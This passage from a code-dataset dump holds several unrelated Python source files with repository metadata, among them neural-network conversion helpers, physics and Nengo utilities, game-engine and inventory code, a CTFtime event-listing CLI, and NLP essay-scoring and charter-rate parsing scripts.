_instance_norm)\n torch.topk = RegOp(torch.topk, _topk)\n torch.argmax = RegOp(torch.argmax, _argmax)\n torch.div = RegOp(torch.div, _div)\n torch.split = RegOp(torch.split, _split)\n torch.reshape = RegOp(torch.reshape, _reshape)\n\n\ndef reg_torch_nn_op():\n \"\"\"\n Registration list about all torch.nn support op\n \"\"\"\n # Hsigmoid = RegOp(Hsigmoid, _Hsigmoid)\n\n\ndef reg_tensor_op():\n \"\"\"\n Registration list about all tensor support op\n \"\"\"\n for tensor_ in [torch.Tensor]:\n # c = a + b\n tensor_.__add__ = _add\n\n # c = a - b\n tensor_.__sub__ = _sub\n\n # # view (instead by torch.reshape), permute for [TRT] shuffle layer\n # tensor_.permute = RegTensorOp(tensor_.permute, _permute)\n #\n # # expand_as for [TRT] expand layer\n # tensor_.expand_as = RegTensorOp(tensor_.expand_as, _expand_as)\n\n\ndef reg_plugin_op():\n \"\"\"\n Registration list about all plugin support op\n \"\"\"\n pass\n\n\nclass Build:\n \"\"\"\n build the 
configuration file.\n \"\"\"\n\n def __init__(self, model=None, input_var=None):\n self.model = model\n self.input = input_var\n create_network()\n reg_functional_op() # torch.nn.functional\n reg_torch_op() # torch\n reg_torch_nn_op() # torch.nn\n reg_tensor_op() # torch.Tensor\n reg_plugin_op() # plugin\n\n def build(self):\n\n print(\"starting ...\")\n INLINE = False\n self.model.eval()\n\n log.init([self.input])\n with torch.no_grad():\n output = self.model(self.input)\n INLINE = True\n\n js_param = get_parameters()\n # mark output layer\n if len(output) >= 2:\n for i, out in enumerate(output):\n for j, layer_param in enumerate(js_param[\"network\"]):\n if layer_param[\"layerName\"] == LayerOut_id[int(id(output))]:\n js_param[\"network\"][j][\"outputName\"] = f\"{cfg.OUTPUTBLOBNAME}_{i + 1}\"\n\n elif len(output) == 1:\n for j, layer_param in enumerate(js_param[\"network\"]):\n if layer_param[\"layerName\"] == LayerOut_id[int(id(output))]:\n js_param[\"network\"][j][\"outputName\"] = cfg.OUTPUTBLOBNAME\n break\n\n # save json file\n with open(os.path.join(cfg.JSON_FILE_DIR, cfg.MODELNAME, cfg.MODELNAME + \".json\"), \"w\") as file:\n json.dump(js_param, file, indent=4, ensure_ascii=False)\n\n print(\"successed! ...\")\n return\n","repo_name":"tianxin1024/generater","sub_path":"src/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":30171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21902924290","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import division\n\nimport numpy as np\n\n__all__ = 'IC',\n\n\nclass IC(object):\n \"\"\"\n Initial condition entropy or energy density profile.\n\n :param array-like profile:\n The IC profile as a block-style grid.\n\n :param dxy:\n Size of each grid cell in fm, either a single value ``dxy = dx = dy``\n or a pair ``dxy = (dx, dy)``.\n :type dxy: float or pair of floats\n\n \"\"\"\n def __init__(self, profile, dxy):\n self._profile = np.asarray(profile, dtype=float)\n\n # save (x, y) steps\n try:\n self._dx, self._dy = dxy\n except (TypeError, ValueError):\n self._dx = self._dy = dxy\n\n # save (x, y) max\n ny, nx = self._profile.shape\n xmax = .5*self._dx*(nx - 1.)\n ymax = .5*self._dy*(ny - 1.)\n self._xymax = xmax, ymax\n\n # calculate and save center of mass\n X = np.linspace(-xmax, xmax, nx)\n Y = np.linspace(ymax, -ymax, ny)\n cm = np.array((\n np.inner(X, self._profile.sum(axis=0)),\n np.inner(Y, self._profile.sum(axis=1))\n ))\n cm /= self._profile.sum()\n self._cm = cm\n\n def sum(self):\n \"\"\"\n Total entropy or energy.\n\n \"\"\"\n return self._profile.sum() * self._dx * self._dy\n\n def cm(self):\n \"\"\"\n Center of mass coordinates, assuming the middle of the profile is\n (0, 0).\n\n \"\"\"\n return self._cm\n\n def ecc(self, n):\n r\"\"\"\n Calculate eccentricity harmonic `\\varepsilon_n`.\n\n :param int n: Eccentricity order.\n\n \"\"\"\n ny, nx = self._profile.shape\n xmax, ymax = self._xymax\n xcm, ycm = self._cm\n\n # create (X, Y) grids relative to CM\n Y, X = np.mgrid[ymax:-ymax:1j*ny, -xmax:xmax:1j*nx]\n X -= xcm\n Y -= ycm\n\n # create grid of weights = profile * R^n\n Rsq = X*X + Y*Y\n if n == 1:\n W = np.sqrt(Rsq, out=Rsq)\n elif n == 2:\n W = Rsq\n else:\n if n & 1: # odd n\n W = np.sqrt(Rsq)\n else: # even n\n W = np.copy(Rsq)\n # multiply by R^2 until W = R^n\n for _ in range(int((n-1)/2)):\n W *= Rsq\n W *= self._profile\n\n # create grid of e^{i*n*phi} * W\n i_n_phi = np.zeros_like(X, dtype=complex)\n np.arctan2(Y, X, 
out=i_n_phi.imag)\n i_n_phi.imag *= n\n exp_phi = np.exp(i_n_phi, out=i_n_phi)\n exp_phi *= W\n\n return abs(exp_phi.sum()) / W.sum()\n","repo_name":"Duke-QCD/hic","sub_path":"hic/initial.py","file_name":"initial.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"2471709195","text":"import numpy\nfrom spinn_utilities.overrides import overrides\nfrom nengo_spinnaker_gfe.connection_parameters. \\\n abstract_transmission_parameters import AbstractTransmissionParameters\nfrom nengo_spinnaker_gfe.connection_parameters. \\\n pass_through_node_transmission_parameters import \\\n PassthroughNodeTransmissionParameters\nfrom nengo_spinnaker_gfe.nengo_exceptions import \\\n NotConcatableTransmissionParameter\nfrom nengo_spinnaker_gfe.utility_objects.parameter_transform import \\\n ParameterTransform\nfrom nengo_spinnaker_gfe.connection_parameters.\\\n transmission_parameters_impl import TransmissionParametersImpl\n\ntry:\n from xxhash import xxh64 as fasthash\nexcept ImportError: # pragma: no cover\n from hashlib import md5 as fasthash\n import warnings\n warnings.warn(\"xxhash not installed, falling back to md5. \"\n \"Install xxhash to improve build performance.\", UserWarning)\n\n\nclass EnsembleTransmissionParameters(\n TransmissionParametersImpl, AbstractTransmissionParameters):\n \"\"\"Parameters describing information transmitted by an ensemble.\n\n Attributes\n ----------\n decoders : ndarray\n A matrix describing a decoding of the ensemble (sized N x D).\n learning_rule :\n Learning rule associated with the decoding.\n \"\"\"\n\n __slots__ = [\n #\n \"_decoders\",\n #\n \"_learning_rule\"]\n\n def __init__(self, decoders, transform, learning_rule=None):\n AbstractTransmissionParameters.__init__(self)\n TransmissionParametersImpl.__init__(self, transform)\n\n # Copy the decoders into a C-contiguous, read-only array\n self._decoders = numpy.array(decoders, order='C')\n self._decoders.flags[transform.FLAGS_NAME] = False\n\n # Store the learning rule\n self._learning_rule = learning_rule\n\n def __repr__(self):\n return \"{}:{}:{}\".format(\n self._transform, self._decoders, self._learning_rule)\n\n def __str__(self):\n return self.__repr__()\n\n @property\n def decoders(self):\n return self._decoders\n\n @property\n def learning_rule(self):\n return self._learning_rule\n\n @overrides(TransmissionParametersImpl.__eq__)\n def __eq__(self, other):\n # Two connection_parameters are equal only if they are of the same\n # type, and are equivalent in all other\n # fields.\n return (super(EnsembleTransmissionParameters, self).__eq__(other) and\n numpy.array_equal(self._decoders, other.decoders) and\n self._learning_rule == other.learning_rule)\n\n @overrides(TransmissionParametersImpl.__hash__)\n def __hash__(self):\n return hash((type(self), self._learning_rule, self._transform,\n fasthash(self._decoders).hexdigest()))\n\n @overrides(AbstractTransmissionParameters.concat)\n def concat(self, other):\n \"\"\"Create new connection connection_parameters which are the result of\n concatenating this connection with others.\n\n Parameters\n ----------\n other : PassthroughNodeTransmissionParameters\n Connection connection_parameters to add to the end of this connection.\n\n Returns\n -------\n EnsembleTransmissionParameters or None\n Either a new set of transmission connection_parameters, or None if the\n resulting transform contained no non-zero values.\n \"\"\"\n\n if not isinstance(other, 
PassthroughNodeTransmissionParameters):\n raise NotConcatableTransmissionParameter()\n\n # Get the outgoing transformation\n new_transform = self._transform.concat(other.transform)\n\n # Create a new connection (unless the resulting transform is empty,\n # in which case don't)\n if new_transform is not None:\n return EnsembleTransmissionParameters(\n self._decoders, new_transform, self._learning_rule\n )\n else:\n # The transform consisted entirely of zeros so return None.\n return None\n\n @property\n @overrides(TransmissionParametersImpl.as_global_inhibition_connection)\n def as_global_inhibition_connection(self):\n \"\"\"Construct a copy of the connection with the optimisation for global\n inhibition applied.\n \"\"\"\n assert self.supports_global_inhibition\n transform = self.full_transform(slice_out=False)[0, :]\n\n return EnsembleTransmissionParameters(\n self._decoders,\n ParameterTransform(\n size_in=self._decoders.shape[0], size_out=1,\n transform=transform, slice_in=self._transform.slice_in)\n )\n\n @property\n def full_decoders(self):\n \"\"\"Get the matrix corresponding to a combination of the decoders and\n the transform applied by the connection.\n \n @:return numpy array\n @:rtype numpy.array\n \"\"\"\n return numpy.dot(self.full_transform(slice_in=False, slice_out=False),\n self._decoders)\n","repo_name":"SpiNNakerManchester/NengoSpiNNaker","sub_path":"nengo_spinnaker_gfe/connection_parameters/ensemble_transmission_parameters.py","file_name":"ensemble_transmission_parameters.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25821522510","text":"from uplogic.nodes import ULActionNode\nfrom bge.types import KX_GameObject\nfrom bge.logic import sendMessage\nfrom uplogic.nodes import ULOutSocket\n\n\nclass ULSendMessage(ULActionNode):\n def __init__(self):\n ULActionNode.__init__(self)\n self.condition = None\n self.from_obj = None\n self.to_obj = None\n self.subject = None\n self.body = None\n self.done = False\n self.OUT = ULOutSocket(self, self.get_out)\n\n def get_out(self):\n return self.done\n\n def evaluate(self):\n self.done = False\n if not self.get_input(self.condition):\n return\n from_obj: KX_GameObject = self.get_input(self.from_obj)\n to_obj: KX_GameObject = self.get_input(self.to_obj)\n subject = self.get_input(self.subject)\n body = self.get_input(self.body)\n sendMessage(\n subject,\n body,\n to_obj.name if to_obj else '',\n from_obj.name if from_obj else ''\n )\n self.done = True\n","repo_name":"UPBGE/uplogic","sub_path":"uplogic/nodes/actions/sendmessage.py","file_name":"sendmessage.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"49838238036","text":"import numpy as np\r\nimport cv2\r\nimport os\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\nif __name__ == \"__main__\":\r\n dirr = './images'\r\n images = []\r\n # loop over the folder and insert each image to the list created above. 
\r\n for pic in os.listdir(dirr):\r\n img = cv2.imread(os.path.join(dirr,pic))\r\n if img is not None:\r\n images.append(img)\r\n \r\n for i in range(len(images)):\r\n # convert to gray, blur find edges\r\n gray = cv2.cvtColor(images[i],cv2.COLOR_BGR2GRAY)\r\n gray = cv2.medianBlur(gray, 7)\r\n gray=255-gray\r\n gray = cv2.normalize(gray, gray, 0, 255, cv2.NORM_MINMAX) \r\n gray = cv2.Canny(gray,90,110)\r\n kernel = np.ones((5,5),np.uint8)\r\n gray = cv2.dilate(gray,kernel,iterations = 1)\r\n rows = gray.shape[0]\r\n # now find circles or semi circles in the pictures which are the fingers \r\n circles = cv2.HoughCircles(gray, cv2.HOUGH_GRADIENT, 1.1, rows / 8,\r\n param1=30, param2=20,\r\n minRadius=1, maxRadius=30)\r\n if circles is not None:\r\n circles = np.uint16(np.around(circles))\r\n for j in circles[0, :]:\r\n center = (j[0], j[1])\r\n radius = j[2]\r\n cv2.circle(images[i], center, 3, (255, 0, 0), 3)\r\n \r\n\r\n\r\n\r\n plt.imshow(images[i])\r\n plt.title(i+1)\r\n plt.tight_layout()\r\n plt.show()","repo_name":"JameelSi/HandDetector","sub_path":"projectIM2021_1.py","file_name":"projectIM2021_1.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44240348130","text":"# -*- coding: utf-8 -*-\n\nEAST_ZONES = ['east', 'feast', 'f.east']\n\n\ndef parse_arrival_zones(raw_arrival_zone):\n \"\"\"Split the raw arrival zones into a list of arrival zones, separated by '-'.\n\n Args:\n raw_arrival_zone (str):\n\n Returns:\n list(str)\n\n \"\"\"\n raw_arrival_zones = raw_arrival_zone.split('-')\n raw_arrival_zones_treated = []\n for zone in raw_arrival_zones:\n if any(zone.lower() == east_zone for east_zone in EAST_ZONES):\n raw_arrival_zones_treated.append('Eastern Asia')\n else:\n raw_arrival_zones_treated.append(zone)\n return raw_arrival_zones_treated\n\n\ndef create_voyage_raw_text(departure, arrival):\n \"\"\"From the origin and arrival zones, create the voyage raw text on the following form:\n departure/arrival.\n\n Args:\n departure (str):\n arrival (str):\n\n Returns:\n str\n\n Examples:\n >>> create_voyage_raw_text('foo', 'bar')\n 'foo/bar'\n >>> create_voyage_raw_text('foo', ['france', 'spain'])\n 'foo/france-spain'\n\n \"\"\"\n # in case we receive several arrivals instead of a single string\n if isinstance(arrival, list):\n arrival = '-'.join(arrival)\n\n return '/'.join([departure, arrival])\n\n\ndef parse_rate(rate, quantity=1):\n \"\"\"Try to parse human conventions for charter rates.\n\n Glossary:\n - PD: Per Day\n - WS: World Scale\n\n Examples:\n List of supported fomrmats.\n\n >>> parse_rate('17K PD')\n '17K PD'\n >>> parse_rate('550k')\n 550000.0\n >>> parse_rate('1.85M')\n 1850000.0\n >>> parse_rate('3.3 M')\n 3300000.0\n >>> parse_rate('435000lumpsum')\n 435000.0\n >>> parse_rate('USD 1,86M')\n 1860000.0\n >>> parse_rate('WS40')\n 40.0\n >>> parse_rate('WS 137,5')\n 137.5\n >>> parse_rate('USD 70 PT', 1000)\n 70000.0\n >>> # '-' or '/' seperated values mean it will depend from the\n >>> # destination, hence we cannot decide at this point\n >>> parse_rate('WS58.75/60.75')\n\n >>> parse_rate('USD12,5MT')\n\n >>> parse_rate('RNR')\n\n >>> parse_rate('OWN PROG')\n\n >>> parse_rate('WS25-23(CC/SS)')\n\n >>> parse_rate('US$1.8-2.3M')\n\n Args:\n rate (str):\n quantity (int):\n\n Return:\n float\n\n \"\"\"\n # don't process\n # TODO investigate why we don't need to process this one\n # TODO: ev: we should add tests for this function\n if 'PD' in rate:\n return rate\n\n # we 
can't do much with that (RNR means Rate Not Reported for rxample, and\n # we don't yet support USD12,5MT)\n if rate in ['RNR', 'COA', 'OWN PROG', 'OWN'] or 'MT' in rate:\n return None\n\n # clean up and normalize\n rate = rate.upper().strip().replace(' ', '')\n\n # Remove currency, since we distinguish rates and dollar prices using the order of magnitude.\n # do it before the rate_coeff choice since 'M' is in 'LUMPSUM'.\n for currency in ['LUMPSUM', 'US$', 'USD']:\n rate = rate.replace(currency, '')\n\n coeff = _choose_rate_coeff(rate, quantity) or 1.0\n # Now that we have the rate coefficient, remove coeff substring.\n for coeff_string in ['PT', 'M', 'K']:\n rate = rate.replace(coeff_string, '')\n\n if rate.startswith('W'):\n rate = _clean_ws_rate(rate)\n\n if '-' in rate or '/' in rate:\n return None\n\n # finally, the actual parsing\n return to_digit(rate) * coeff\n\n\ndef to_digit(value):\n \"\"\"\"Parse a numerical string to return a float.\n\n Args:\n value(str): human style float. See example for supported format\n\n Returns:\n float: parsed float value\n\n Raises:\n ValueError: If the given str wasn't a float\n\n Examples:\n Here is a list of illustrations of the format supported.\n\n >>> to_digit('3.3')\n 3.3\n >>> to_digit('1,2')\n 1.2\n >>> to_digit('3,3 M')\n 3300000.0\n >>> to_digit('4k')\n 4000.0\n >>> to_digit('foo') # doctest: +IGNORE_EXCEPTION_DETAIL\n Traceback (most recent call last):\n ...\n ValueError: could not convert string to float: FOO\n\n \"\"\"\n # remove space and normalize digit symbol\n value = value.upper().replace(' ', '').replace(',', '.')\n\n if 'M' in value:\n return float(value.replace('M', '')) * 1e6\n elif 'K' in value:\n return float(value.replace('K', '')) * 1e3\n else:\n return float(value)\n\n\ndef _clean_ws_rate(rate):\n for dirty in ['WS', 'W', '/RNR', '(CC/SS)']:\n rate = rate.replace(dirty, '')\n\n # TODO probably need to check the use-case and the implementation\n if ',' in rate and '/' in rate:\n # case: WS 32/35.5, 35/38.5 => 32/38.5\n partials = rate.split(',')\n partials = [r.split() for r in partials]\n partials = [item for r in partials for item in r]\n rate = '/'.join([partials[0], partials[-1]])\n\n return rate\n\n\ndef _choose_rate_coeff(rate, quantity=None):\n \"\"\"Convert human-formatted numeric abbreviations.\n\n Args:\n rate (str): human-like numeric\n quantity (int): ?????? 
(@seb)\n\n Returns:\n float: numeric translation of the given raw input\n\n Example:\n\n >>> _choose_rate_coeff('30K')\n 1000.0\n >>> _choose_rate_coeff('30M')\n 1000000.0\n >>> # special cases\n >>> _choose_rate_coeff('unknown')\n >>> _choose_rate_coeff('whateverPT', quantity=4.0)\n 4.0\n\n \"\"\"\n if 'PT' in rate:\n return quantity\n elif 'M' in rate:\n return 1e6\n elif 'K' in rate:\n return 1e3\n\n # give up if we don't understand the input\n return None\n","repo_name":"theHausdorffMetric/test","sub_path":"kp_scrapers/spiders/charters/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13036885948","text":"# -*- coding: utf8 -*-\n\nfrom collections import defaultdict\nfrom pycraft.service.const import ContainerWindowID\nfrom pycraft.service.part.item import ItemID\nfrom .base import Container\n\n\nclass InventoryContainer(Container):\n \n SIZE = 36\n\n def __init__(self):\n super().__init__(ContainerWindowID.INVENTORY, self.SIZE)\n # TODO: indexを持たせる\n\n def add_item(self, item):\n \"\"\"Itemをslotsに保存する\n \n クライアントの実装では、indexが小さい方から詰めて保存する\n\n item : Item\n return : Itemを保存したslotsのindex(保存できないときは-1)\n \"\"\"\n empty_slot = None\n for i in range(self.SIZE):\n if self[i].id == item.id:\n count = self[i].count + item.count\n if count <= self[i].MAX_COUNT:\n self[i].count = count\n return i\n else:\n # 詰めた分は通知しなくてもクライアントが勝手に変更する\n diff = self[i].MAX_COUNT - self[i].count\n self[i].count = self[i].MAX_COUNT\n item.count -= diff\n elif self[i].id == ItemID.AIR:\n if empty_slot == None:\n empty_slot = i\n if empty_slot != None:\n self[empty_slot] = item\n return empty_slot\n return -1\n \n def use_item(self, i, target):\n \"\"\"Item を使用する\n \n i : slots の index\n target : Entity or Block (Item を使用する対象)\n return : Item が壊れたら True\n \"\"\"\n target.hit_item(self[i])\n if self[i].is_broken():\n self[i] = self.create_empty()\n return True\n return False\n\n def reduce_items(self, items):\n \"\"\"指定された Item を削除する\n \n return : generator((slot, is_empty))\n \"\"\"\n # 削除する個数を種類毎に数える\n counts = defaultdict(int)\n for item in items:\n if item.id != ItemID.AIR:\n counts[item.id] += item.count\n # 削除する\n updated = {}\n for slot, item in enumerate(self):\n if item.id in counts:\n before = self[slot].count\n self[slot].count -= counts[item.id]\n counts[item.id] = 0\n if self[slot].count < 0:\n counts[item.id] = -self[slot].count\n else:\n del counts[item.id]\n updated[slot] = before - self[slot].count\n # 足りなかった場合はロールバック\n if len(counts) > 0:\n for slot, count in updated:\n self[slot].count += count\n raise ValueError(\n '{name} does not have items.'.format(name=self.name))\n # 更新を確定し、個数 0 は empty に設定する\n for slot in updated.keys():\n if self[slot].count == 0:\n self[slot] = self.create_empty()\n yield slot, True\n else:\n yield slot, False\n\n\nclass ArmorContainer(Container):\n \n SIZE = 4\n\n def __init__(self):\n super().__init__(ContainerWindowID.ARMOR, self.SIZE)\n","repo_name":"nosix/PyCraft","sub_path":"src/pycraft/service/composite/container/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"ja","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"33436659842","text":"## Librerías\n\n# Procesamiento de datos\nimport numpy as np\nimport pandas as pd\n\n# Herramientas de gramática\nimport language_tool_python\nimport contractions\nimport re\n\n# Procesamiento de lenguaje natural\nimport 
nltk\nfrom textblob import TextBlob, Word\nfrom textblob.sentiments import PatternAnalyzer, NaiveBayesAnalyzer\n\n# Visualizaciones\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n## Cargo el dataset\n\ndf = pd.read_csv(\"text_data.csv\")\n\n## Paso 1: Procesamiento de los datos\n\ndef check_mistakes(text, tool = language_tool_python.LanguageTool('en-GB')): # Busco y corrijo los errores de un solo texto\n\n # Limpieza de formato\n\n pattern = r\"[^\\w\\.',]\"\n\n text = re.sub(pattern, \" \", text)\n\n text = re.sub(f\"[ ]+\", \" \", text)\n\n # Errores ortográficos y tipográficos \n\n spelling_mistakes = len(tool.check(text))\n\n text = tool.correct(text)\n\n # Deshacer contracciones\n \n contract = text.count(\"'\")\n\n correct_text = contractions.fix(text)\n\n return spelling_mistakes, contract, correct_text\n\ndef check_data(df): # Busco y corrijo los errores de todos los textos del DataFrame\n \n # Inicializo las listas\n \n spelling_mistakes_list = list()\n \n contract_list = list()\n \n correct_text_list = list()\n \n # Inica el servidor\n \n tool = language_tool_python.LanguageTool('en-GB') # Servidor local\n\n # Analizo los textos\n\n for i in range(len(df)):\n\n text = df[\"full_text\"][i]\n\n spelling_mistakes, contract, correct_text = check_mistakes(text, tool)\n \n spelling_mistakes_list.append(spelling_mistakes)\n \n contract_list.append(contract)\n \n correct_text_list.append(correct_text)\n \n # Cierra el servidor\n \n tool.close() \n\n # Añado los valores al DataFrame\n \n df[\"correct_text\"] = np.array(correct_text_list)\n\n df[\"spelling_mistakes\"] = np.array(spelling_mistakes_list)\n \n df[\"contractions\"] = np.array(contract_list)\n \n return df\n\n# Ejecuto el procesamiento de los datos del dataframe\n\ncorrect_df = check_data(df)\n\ncorrect_df.to_csv(\"corrected_text.csv\", index = False)\n\n## Paso 2: Procesamiento del lenguaje natural (NLP)\n\ndef get_metrics(text): # Obtengo las métricas de un solo texto\n\n # Numero de palabras por oracion\n\n sentences = len(nltk.sent_tokenize(text))\n\n words = len(nltk.word_tokenize(text))\n\n words_per_sent = words / sentences\n\n # Riqueza del lenguaje\n\n unique_words = len(set(nltk.word_tokenize(text)))\n\n richness = unique_words / words\n\n # Numero de palabras que aportan información\n\n stopwords = nltk.corpus.stopwords.words(\"english\")\n\n useful_words = list()\n\n # Elimino los signos de puntuación para analizar el texto\n\n pattern = r\"[^\\w\\d\\s]\"\n\n clean_text = re.sub(pattern, \" \", text)\n\n clean_text = re.sub(f\"[ ]+\", \" \", clean_text)\n\n for word in nltk.word_tokenize(clean_text):\n\n if word.casefold() not in stopwords :\n\n useful_words.append(word)\n\n informative = len(useful_words) / words\n \n # Análisis sintáxico / morfológico\n\n verb = [\"VB\", \"VBD\", \"VBG\", \"VBN\", \"VBP\", \"VBZ\"]\n\n verb_list = list()\n\n adjective = [\"JJ\", \"JJR\", \"JJS\"]\n\n adjective_list = list()\n\n adverb = [\"RB\", \"RBR\", \"RBS\"]\n\n adverb_list = list()\n\n blob = TextBlob(text)\n\n for word in blob.tags:\n\n if word[1] in verb:\n\n v = Word(word[0]).lemmatize(\"v\")\n\n verb_list.append(v)\n\n elif word[1] in adjective:\n\n adjective_list.append(word[0])\n\n elif word[1] in adverb:\n\n adverb_list.append(word[0])\n\n # Tipos de palabras utilizadas\n\n unique_verbs = len(set(verb_list))\n\n unique_adjectives = len(set(adjective_list))\n\n unique_adverbs = len(set(adverb_list))\n \n # Análisis del sentimiento del texto\n\n blob = TextBlob(text, analyzer = 
PatternAnalyzer())\n\n polarity = blob.sentiment[0]\n\n subjectivity = blob.sentiment[1]\n \n # Análisis del sentimiento del texto\n\n #blob = TextBlob(text, analyzer = NaiveBayesAnalyzer())\n\n #positive = blob.sentiment[1]\n\n #negative = blob.sentiment[2]\n \n return words_per_sent, richness, informative, unique_verbs, unique_adjectives, unique_adverbs, polarity, subjectivity\n\ndef get_metrics_data(df): # Obtengo las métricas de todos los textos del DataFrame\n \n # Inicializo las listas\n \n words_per_sent_list = list()\n \n richness_list = list()\n \n informative_list = list()\n \n unique_verbs_list = list()\n \n unique_adjectives_list = list()\n \n unique_adverbs_list = list()\n \n polarity_list = list()\n \n subjectivity_list = list()\n \n spelling_mistakes_list = list()\n \n contract_list = list()\n \n correct_text_list = list()\n\n # Analizo los textos\n\n for i in range(len(df)):\n\n text = df[\"correct_text\"][i]\n\n words_per_sent, richness, informative, unique_verbs, unique_adjectives, unique_adverbs, polarity, subjectivity = get_metrics(text)\n \n words_per_sent_list.append(words_per_sent)\n \n richness_list.append(richness)\n \n informative_list.append(informative)\n\n unique_verbs_list.append(unique_verbs)\n\n unique_adjectives_list.append(unique_adjectives)\n\n unique_adverbs_list.append(unique_adverbs)\n\n polarity_list.append(polarity)\n \n subjectivity_list.append(subjectivity)\n\n # Añado los valores al DataFrame\n\n df[\"words_per_sent\"] = np.array(words_per_sent_list)\n \n df[\"richness\"] = np.array(richness_list)\n \n df[\"informative\"] = np.array(informative_list)\n\n df[\"unique_verbs\"] = np.array(unique_verbs_list)\n\n df[\"unique_adjectives\"] = np.array(unique_adjectives_list)\n\n df[\"unique_adverbs\"] = np.array(unique_adverbs_list)\n\n df[\"polarity\"] = np.array(polarity_list)\n \n df[\"subjectivity\"] = np.array(subjectivity_list)\n \n return df\n\n# Ejecuto el procesamiento de los datos del dataframe\n\nscored_df = get_metrics_data(correct_df)\n\nscored_df.to_csv(\"scored_text.csv\", index = False)\n","repo_name":"martabuaf/English-Text-Evaluation","sub_path":"text_processing.py","file_name":"text_processing.py","file_ext":"py","file_size_in_byte":6130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25964291666","text":"#!/usr/bin/env python\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom rich.console import Console\nfrom rich.table import Table\nfrom datetime import datetime\nimport argparse\nfrom sys import exit\nfrom rich import print\nfrom ctfl import __version__\n\n\ndef main():\n url = 'https://ctftime.org/event/list/upcoming'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5\\\n 37.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'\n }\n\n parser = parseArgs()\n args = parser.parse_args()\n\n months = {1: \"Jan\", 2: \"Feb\", 3: \"Mar\", 4: \"Apr\", 5: \"May\", 6: \"Jun\", 7: \"Jul\", 8: \"Aug\", 9: \"Sept\", 10: \"Oct\", 11: \"Nov\", 12: \"Dec\"}\n\n if (args.next):\n month = months[int(datetime.now().strftime(\"%m\")) + 1]\n elif (args.all):\n month = None\n elif (args.version):\n print(\"[bold]ctfl {}[/]\".format(__version__))\n exit(0)\n else:\n month = datetime.now().strftime(\"%b\")\n try:\n data = extract_data(url, headers, month)\n print_data(data)\n except KeyboardInterrupt:\n exit(1)\n except Exception:\n print(\"[[bold red]-[/]] Unexpected error occurred, Try again...\")\n\n\ndef parseArgs():\n parser = 
argparse.ArgumentParser(description=\"CTFTime Upcoming CTF Events Lists\")\n group = parser.add_mutually_exclusive_group(required=False)\n group.add_argument(\n \"-n\",\n \"--next\",\n action=\"store_true\",\n help=\"Get the list of events for the next month\"\n )\n group.add_argument(\n \"-a\",\n \"--all\",\n action=\"store_true\",\n help=\"List all available CTFs on the event list\"\n )\n group.add_argument(\n \"-v\",\n \"--version\",\n action=\"store_true\",\n help=\"Prints the version of the tool\"\n )\n return parser\n\n\ndef extract_data(url, headers, month):\n req = requests.get(url, headers=headers)\n\n soup = BeautifulSoup(req.text, 'html.parser')\n events_table = soup.find_all('table')[0]\n\n names = []\n dates = []\n styles = []\n locations = []\n weights = []\n links = []\n base_link = \"https://ctftime.org\"\n\n if (month is not None):\n for i in events_table.find_all('tr')[1::]:\n columns = i.find_all('td')\n date = columns[1].text.strip()\n if (month in date):\n dates.append(date)\n names.append(columns[0].a.text.strip())\n links.append(base_link + columns[0].a.get('href').strip())\n styles.append(columns[2].text.strip())\n locations.append(columns[3].text.strip())\n weights.append(columns[4].text.strip())\n else:\n pass\n else:\n for i in events_table.find_all('tr')[1:]:\n columns = i.find_all('td')\n names.append(columns[0].a.text.strip())\n links.append(base_link + columns[0].a.get('href').strip())\n dates.append(columns[1].text.strip())\n styles.append(columns[2].text.strip())\n locations.append(columns[3].text.strip())\n weights.append(columns[4].text.strip())\n\n data = [names, dates, styles, locations, weights, links]\n return data\n\n\ndef print_data(data):\n table = Table(title=\"CTFTime CTF Events\")\n\n table.add_column(\"Name\", justify=\"left\", style=\"cyan\", no_wrap=True)\n table.add_column(\"Date\", justify=\"center\", style=\"cyan\")\n table.add_column(\"Style\", justify=\"center\", style=\"cyan\")\n table.add_column(\"Location\", justify=\"center\", style=\"cyan\")\n table.add_column(\"Weight\", justify=\"right\", style=\"cyan\")\n\n for i in range(len(data[0])):\n table.add_row(data[0][i], data[1][i], data[2][i], data[3][i], data[4][i], style=\"link \" + data[5][i])\n\n console = Console()\n console.print(table)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"thehackersbrain/ctfl","sub_path":"ctfl/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73247650889","text":"# Problem: https://leetcode.com/problems/missing-number/\n\n# Complexity: O(n) time, O(n) space\n\nfrom typing import Dict, List\n\n\nclass Solution:\n def missingNumber(self, nums: List[int]) -> int:\n keys: Dict[int, int] = {}\n\n for n in nums:\n keys[n] = 1\n\n for i in range(len(nums)+1):\n if i not in keys:\n return i\n\n # Should not get here\n return -1\n","repo_name":"emmaneugene/algos","sub_path":"leetcode/blind75/missingNumber.py","file_name":"missingNumber.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31216974063","text":"\"\"\"\nTabela de emojis Unicode: 